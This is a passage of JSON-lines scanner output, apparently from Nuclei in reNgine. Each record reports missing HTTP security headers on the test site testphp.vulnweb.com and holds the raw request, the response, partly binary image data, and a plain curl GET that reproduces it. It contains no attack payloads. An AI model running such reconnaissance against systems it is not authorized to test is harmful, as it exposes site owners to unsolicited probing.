dE\\n\\ufffd\\u001cl\\ufffd\\u0018\\ufffd\\ufffd\\u0000\\ufffd\\ufffdp\\ufffdx\\u003e\\ufffdʫ)\\u0015\\ufffdA\\u001b\\ufffd\\ufffdY$\\ufffd\\ufffd\\ufffdYcm\\ufffdc\\ufffd\\u0018\\\\\\u0000|g\\ufffd{\\ufffd\\ufffdQ\\ufffd\\ufffdԲ\\ufffdYL\\ufffdX\\ufffd\\ufffd\\u0002\\ufffdw/~\\ufffd\\u001c\\ufffd\\ufffd:glz}n\\ufffd\\ufffd\\u0014\\ufffd\\ufffd\\ufffd\\ufffdeWJ\\ufffdn\\ufffd\\u0014QE\\tK\\ufffd\\ufffdS\\ufffd?\\ufffd\\u001e\\ufffd\\ufffd\\ufffde\\ufffd\\ufffd2\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffd~(E\\ufffdh\\ufffd\\ufffdw\\ufffd\\ufffd\\ufffdTl\\ufffd⤢\\ufffd\\u0003eRH\\ufffdv\\ufffd\\ufffd@\\ufffd\\u0004\\ufffd3\\ufffd\\t\\u003ce~\\ufffd\\ufffd\\ufffdW\\u0008\\ufffd\\ufffdvn\\u0018n\\u0001\\ufffdy \\ufffd\\ufffd\\u0012\\u0000\\ufffd\\ufffdG\\u0016\\ufffd\\ufffd)\\ufffd6ޙ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd3\\u001b\\ufffd\\ufffd?\\u0014\\ufffd7\\u0002\\u0017\\ufffdl\\ufffd\\ufffdԴ\\ufffd.QU\\ufffd\\ufffdE\\ufffd#\\ufffd~8#8$g\\ufffd\\ufffd\\ufffdޑ-\\ufffd^\\ufffd\\ufffdKp\\ufffd\\ufffd\\ufffdaLͱG~\\u0013;s\\ufffd8\\ufffd'\\ufffdq\\\\\\ufffd􃨮.\\u0012]\\u001a\\ufffd帒\\u0012\\u001a\\u0007 \\ufffdH\\ufffd\\u0014\\ufffd\\u0003\\u0001U\\ufffd\\ufffd'\\ufffd\\u0000'\\u001c\\u000cV\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd%\\t\\u001eb\\ufffdUf\\ufffd;\\u0010\\ufffdX/%w0\\ufffd9\\ufffdk*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd4;\\ufffd\\ufffd\\ufffd\\u0015ޒx*!\\ufffd:\\ufffd\\u0019X\\ufffdn\\ufffd^\\ufffd%\\ufffd\\u0001\\ufffd0\\ufffdF\\ufffdI\\ufffd\\ufffd\\u0018\\ufffd\\ufffd8 \\u001c\\ufffd\\ufffdd2\\ufffd\\u0007\\ufffd\\ufffd\\ufffdŧY\\ufffda\\ufffd8\\ufffdt\\ufffd\\ufffdQ\\u0019db\\ufffd\\ufffd\\u0018\\ufffd\\ufffdI\\u0018\\ufffdrN1\\ufffd\\ufffdV8\\ufffd\\u0015\\ufffdQD\\ufffdJv\\ufffd\\ufffd\\ufffd\\u001fUI\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdD\\ufffdK[\\ufffdqf\\ufffd\\ufffd\\ufffd*\\ufffdm\\u0004\\ufffd\\u0019\\ufffd?8\\ufffd#=\\ufffdZ\\ufffd\\ufffd\\ufffd\\ufffd.\\ufffd\\ufffdI\\ufffdC\\ufffd\\ufffdb\\ufffd\\ufffd\\u001c[\\ufffd\\ufffd#ö\\u003cn\\u0008W\\ufffd\\u0005\\ufffd\\ufffd8 \\ufffd9\\ufffd\\ufffd6IP\\ufffd\\t\\ufffd\\ufffd\\ufffdyq\\u001c\\ufffd\\ufffd7PA\\ufffd\\ufffd=\\ufffd\\ufffd\\u0015\\ufffd0 1\\ufffd+s\\ufffd\\ufffd2\\u0006pO\\ufffd\\ufffd*\\ufffd9.\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd=R\\ufffdd\\u003c\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\u001f\\ufffd\\ufffdl\\ufffd\\ufffd\\ufffd\\u000f\\ufffdț,\\u0008e\\u0000\\ufffdq\\ufffd8$v\\ufffd\\u003cg\\ufffd\\u0017\\ufffdy\\ufffd\\ufffd\\ufffdM\\ufffdҭ\\ufffd./\\ufffd`N@P\\u0019\\ufffd\\u0004\\ufffd\\u00120q\\ufffdۃ\\ufffdv\\u0016\\u001b\\ufffd\\\"\\ufffd\\ufffdŤv2q\\ufffd\\ufffd\\ufffdѩ\\ufffd\\ufffd\\u001eI(\\ufffd\\ufffdez\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd$\\ufffd(?ju\\u0015\\ufffdۨ\\ufffd~iʠS\\ufffd\\ufffdȺ\\u0001 \\ufffdRJŁ\\u0026\\ufffd\\ufffdv\\ufffd\\ufffd\\ufffd\\u0005\\u0001:\\u000b\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003eU\\ufffd\\ufffd\\ufffdߐFA\\u001eA\\\"\\ufffd\\ufffdD\\ufffdV}C\\ufffd\\ufffd\\ufffd\\u0005\\u000c\\ufffd\\ufffd\\ufffdwo'\\ufffd\\ufffd\\u0019'i\\ufffdT\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\ufffdCE֯\\ufffd[\\ufffdu\\ufffdʊ\\ufffd\\ufffd\\ufffdH\\ufffdш\\ufffdq\\ufffd\\u0016\\\\\\ufffd\\u001c3\\u000c\\ufffdj\\u001fX\\ufffd;|\\u003c,6p\\ufffd|\\ufffd\\ufffd\\ufffdON\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdWf\\ufffdڰ.\\ufffdVu \\u0015\\ufffd\\u0006\\u0016@G\\ufffd9\\u003c\\u001e\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGiz\\ufffdŔ:\\ufffd\\ufffdۥ\\ufffd\\ufffd\\ufffdT\\ufffd\\ufffdh\\ufffd\\ufffdz\\ufffd\\ufffd\\u0006=\\ufffdvFs\\ufffdr\\t\\ufffd4\\ufffds^\\ufffd7\\ufffd\\ufffdÝ\\ufffd\\u0011\\ufffdFW\\ufffd\\ufffd\\u003eT\\ufffd\\u000ct\\ufffdV$\\ufffd\\ufffdO\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\u0013\\u0008cc#M\\u0004\\ufffd\\u0019W\\ufffd\\ufffd\\ufffd\\ufffdGܮ\\u001c\\ufffd\\ufffd\\n~r(i\\ufffd\\ufffdjw\\u0006\\u0018Z\\u003c\\ufffd/\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffdx\\u0007\\u0004\\ufffdb21\\ufffd\\ufffdm\\ufffdu\\ufffdXZ\\ufffd*\\ufffdFھ\\ufffd\\ufffd\\u0000ҰEM\\ufffd\\ufffd$*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffdD}\\ufffd\\ufffdRzE\\u0003\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\u001a\\ufffd{\\ufffd0\\ufffd\\ufffd\\ufffds\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd(\\ufffd\\ufffdך\\ufffd\\u00063ڢ\\ufffd\\ufffd\\ufffd\\ufffdF\\ufffd(\\ufffd\\ufffd\\\"\\ufffd(\\ufffd\\u0008\\ufffd\\ufffd(Bl\\ufffdmEE\\u0015Ġ\\ufffd\\u0006\\ufffd'=袄\\ufffd\\ufffd\\ufffd\\u000e\\ufffdw\\ufffdj\\ufffdwd\\ufffd:\\ufffdY\\u0018e%O(\\ufffdʜv\\ufffd\\u00020@5\\ufffd:\\ufffd6WWqDIX\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffdE\\u0015\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffdߴ\\ufffd+m6\\ufffd\\ufffde\\nč#;rX\\ufffd\\u001e\\ufffdI$\\ufffd\\ufffdw\\ufffd\\u0000\\u0006\\u0000\\ufffd\\\\0\\u0017\\ufffd7\\ufffd\\ufffdU\\u0003\\r\\u0018\\u000b\\ufffd\\ufffd\\u0011\\ufffd\\ufffd9\\u0018\\ufffd\\u0004w\\ufffd\\u003c`\\ufffd\\ufffdȾ$\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffdrțö\\u003e\\ufffdW\\ufffd\\ufffd\\u0013\\ufffdO.\\ufffd=\\ufffdП\\ufffd.\\ufffd\\u0004\\u0001\\ufffd\\ufffdc\\ufffdY!\\n\\ufffd\\ufffdWv\\ufffdv\\ufffd\\u0019e\\u0007\\ufffd\\u0015\\ufffd\\ufffdf\\ufffd\\ufffdӧ\\ufffd\\ufffdmn\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ݑ\\ufffd؁\\ufffd\\ufffd\\u003c`\\ufffd\\ufffd(\\ufffd:\\ufffd\\u0000\\ufffd\\u000f\\ufffdL\\ufffdOd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdigw|\\ufffd\\ufffd)\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u00078\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffd98\\ufffd@\\ufffdE\\u0015\\u0017\\ufffd1\\ufffd\\ufffd\\ufffdE\\ufffd\\u001f`\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\ufffd}\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:13.180741083Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:13.180832348Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"path\":\"/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2\",\"request\":\"GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:13.760747934Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:13.760782036Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin\",\"path\":\"/cgi-bin\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin\",\"request\":\"GET /cgi-bin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eForbidden\\u003c/h1\\u003e\\n\\u003cp\\u003eYou don't have permission to access this resource.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:13.760818475Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts\",\"path\":\"/_mmServerScripts\",\"matched-at\":\"http://testphp.vulnweb.com/_mmServerScripts/\",\"request\":\"GET /_mmServerScripts HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /_mmServerScripts/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /_mmServerScripts/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"MMHTTPDB.php\\\"\\u003eMMHTTPDB.php\\u003c/a\\u003e 11-May-2011 10:27 2111\\r\\n\\u003ca href=\\\"mysql.php\\\"\\u003emysql.php\\u003c/a\\u003e 11-May-2011 10:27 10634\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:14.583181728Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"path\":\"/pictures/2.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/2.jpg.tn\",\"request\":\"GET /pictures/2.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1353\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-549\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001a\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0001\\u0003\\u0004\\u0005\\u0006\\ufffd\\ufffd\\u0000+\\u0010\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0000\\u0004\\u0007\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1AQ\\\"a\\u00142q\\ufffd\\u0005\\u0013$B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0003\\u0001\\u0002\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000'\\u0011\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0001\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1\\u0005Q\\u00132A\\\"#3aq\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffd\\ufffdd\\ufffdH䏺JU\\ufffd\\t\\u000f\\u0008\\ufffdi{\\u0015+f\\ufffd.7\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB6\\ufffd˨\\ufffd\\ufffd\\ufffd\\ufffd͒\\u001bdס\\u001a\\ufffdi\\ufffdE\\ufffdn\\ufffd_\\ufffd\\ufffd%\\u001atN\\u000c\\ufffdpR\\ufffdH\\u001d\\ufffd,֝\\ufffd\\u0000\\u0001 \\u0014\\u0000@'DQ\\u0003\\u0000Qu?b\\ufffd-\\u0010\\u0005\\ufffdL\\u0000\\u0000\\t\\u0000\\u0000\\u0000-\\u0005\\ufffd\\u0001\\ufffd\\ufffd\\u000cH\\ufffd'A\\u0015F\\ufffd\\u001a\\ufffdʔ?z3G\\ufffd^\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdK\\ufffd)\\ufffdۓ\\ufffdl\\ufffd%\\ufffd\\ufffd\\\"䨤\\ufffd\\u001f\\ufffdu\\u0015Ed44\\ufffd2\\u0005\\ufffdS\\ufffdD\\u0002Y\\u0005F\\ufffd`\\u0000\\u0000H\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\r\\u0011L`\\\"\\ufffd)4(\\u000cF\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003%C\\ufffd9\\ufffd\\ufffd1F\\ufffd$\\ufffdc$\\ufffd\\ufffd\\u000f\\ufffd~\\ufffdQ_\\ufffdק{c'K\\ufffd#\\ufffd\\ufffdr|\\ufffdR\\ufffd\\ufffd(\\ufffdԤ\\ufffdI}#;\\ufffd\\ufffdk\\ufffdʚ\\ufffd\\ufffdϳf\\ufffd\\ufffd\\ufffdEmZ\\u00